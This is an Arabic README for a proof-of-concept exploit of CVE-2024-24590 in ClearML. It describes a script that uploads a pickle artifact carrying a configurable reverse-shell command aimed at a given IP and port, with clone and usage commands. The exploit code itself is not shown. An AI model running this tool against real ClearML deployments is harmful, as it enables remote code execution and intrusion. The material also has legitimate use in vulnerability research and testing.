
إثبات المفهوم لـ CVE-2024-24590
_____ _ __ __ _ _____ ____ _____
/ ____| | | \/ | | | __ \ / __ \ / ____|
| | | | ___ __ _ _ __| \ / | | | |__) | | | | |
| | | |/ _ \/ _` | '__| |\/| | | | ___/| | | | |
| |____| | __/ (_| | | | | | | |____ | | | |__| | |____
\_____|_|\___|\__,_|_| |_| |_|______| |_| \____/ \_____| - 2024-24590 x OxyDe
يُظهر هذا المشروع كيفية رفع قطعة أثرية (artifact) بصيغة pickle ديناميكيًا إلى ClearML مع معلمات قابلة للتكوين عبر وسائط سطر الأوامر. يقوم السكربت بتهيئة مهمة ClearML، وتكوين أمر للتنفيذ العكسي للشل (reverse shell) بشكل ديناميكي، ثم رفعه كقطعة أثرية. (PoC-CVE-2024-24590)
clearmlargparsepickleosتثبيت حزمة ClearML:
pip install clearml
استنساخ المستودع:
git clone https://github.com/OxyDeV2/PoC-CVE-2024-24590.git
cd PoC-CVE-2024-24590
لتشغيل السكربت، استخدم الأمر التالي مع الوسائط المناسبة:
python script.py --project_name "<project_name>" --task_name "<task_name>" --tags <tag1> <tag2> ... --artifact_name "<artifact_name>" --ip "<ip_address>" --port "<port>"
شكرًا لـ Skriix :)